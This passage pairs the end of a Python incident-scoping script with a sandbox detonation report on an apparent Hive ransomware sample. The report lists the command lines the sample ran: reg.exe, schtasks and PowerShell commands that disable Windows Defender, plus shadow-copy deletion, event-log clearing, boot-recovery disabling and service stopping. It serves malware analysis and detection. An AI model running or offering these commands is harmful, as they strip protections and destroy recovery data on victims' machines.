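    m = ENCRYPTED_NAME.match(name)
    if not m:
        return None
    return {"directory": directory, **m.groupdict()}


def is_ransom_note(path):
    """True for the note name pattern observed in this run."""
    return bool(RANSOM_NOTE.match(path.rpartition('\\')[2]))


def summarize(paths):
    """Scope a file listing: how many files were renamed, how many notes were
    dropped, and whether a single shared token covers every encrypted file."""
    encrypted = [p for p in (parse_encrypted_name(x) for x in paths) if p]
    shared = Counter(e["shared_token"] for e in encrypted)
    return {
        "encrypted": len(encrypted),
        "notes": sum(1 for x in paths if is_ransom_note(x)),
        "shared_tokens": len(shared),
        "unique_file_tokens": len({e["file_token"] for e in encrypted}),
        "originals": [e["original"] for e in encrypted],
    }


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        tag = "encrypted" if parse_encrypted_name(p) else ("note" if is_ransom_note(p) else "untouched")
        print(f"{tag:9s} {p}")
    print(summarize(SAMPLE_PATHS))
```

Run the same two regular expressions over a file-server listing or EDR file-create telemetry to scope an incident; a shared_tokens count above one means more than one run (or more than one host's output) is mixed into the listing. Treat the 43/12 widths as a hunting rule for this sample, not as a general description of every Hive build.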
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | "C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe" |
| C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y |
| C:\Windows\system32\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\system32\net.exe | net.exe stop "VSS" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\system32\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\system32\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\System32\Wbem\wmic.exe | |
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\mpYx_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e3baa52b70721dad4944dc46b0bb892b |
| SHA1 | 2e7153e792e7bc063dff5af6fb0f159ab42fcfb5 |
| SHA256 | 642e31e822da58b065eab9a37878ef6590f7e9336704a9f2cecade386a71b511 |
| SHA512 | 66edc3cf82e652bf75ba3e83abc6f37215e7afc0ba8f9372c5aacc1cca6c1063fe31655920e6ed6791f9400d1ece69ce9825fdaf3ae278adf3095388f75fab12 |
C:\mpYx_HOW_TO_DECRYPT.txt
| MD5 | e6e9663ba409762ce7b1770348a71620 |
| SHA1 | b0a8dff97924258c6a63aea473c282fa2f4a3ed6 |
| SHA256 | ce1e0ae7d7289cf3b8f24e37fe9c20ca0d0bce292e254ac3a6c4203418b947c9 |
| SHA512 | be343d7b56f9b5c1d4b07bb20816e6fdf049ace5e796e7ea188ccef3689783c659ad00176e55bb3c536428c0acb0af7b8909e9ca0656c70cbacb38c3d6adccaf |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:28
Reported
2022-01-13 13:33
Platform
win10-en-20211208
Max time kernel
21s
Max time network
194s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\IpsMigrationPlugin.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jni.h.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_B_SYlhmj7V00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_V2Y05SV3JlI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_P6bEhAawo240.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_SMyMLJcnZq40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_NUh9FVyebyg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_OLXvXeOfBA80.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_D9gi_BQRk-g0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_a-PJQrqhcxg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_G4cQISVysbQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_2RHdiCGlXRs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PLMBIMcX-1E0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wilVe-b__680.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_UJSSmJnK8Mo0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_hqdhHwEYXkE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wSmC5uUG5-g0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PfIEI01VNv00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Oz6DDTSf_JY0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_8Z2U16BeHjw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7__aD52WGxAmQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\ServiceWatcherSchedule.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_LMIC5Q_DFWk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsid.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_1WSMknV_NUw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
